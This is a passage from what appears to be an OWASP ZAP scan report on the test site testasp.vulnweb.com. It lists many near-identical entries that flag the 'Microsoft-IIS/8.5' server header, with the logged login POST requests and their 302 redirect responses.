Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=15 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:05 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=15">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 461 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=16 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:05 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=16">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 461 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=17 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:05 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=17">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 461 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=18 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:05 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=18">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 461 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=19 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:06 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=19">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 459 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 218 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=2 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:01 GMT Content-Length: 141 |
| Response Body - size: 141 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=2">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 461 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=20 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:06 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=20">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 461 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=21 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:06 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=21">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 461 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=22 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:07 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=22">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 461 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=23 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:07 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=23">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 461 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=24 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:07 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=24">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 461 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=25 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:07 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=25">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 461 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=26 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:08 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=26">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 461 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=27 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:08 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=27">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 461 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=28 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:08 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=28">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 461 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=29 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:08 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=29">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 459 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 218 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=3 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:01 GMT Content-Length: 141 |
| Response Body - size: 141 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=3">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 461 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=30 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:09 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=30">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 461 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=31 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:09 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=31">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 461 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=32 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:09 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=32">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 461 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=33 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:09 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=33">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 461 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=34 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:10 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=34">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 461 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=35 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:10 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=35">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 461 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36 HTTP/1.1
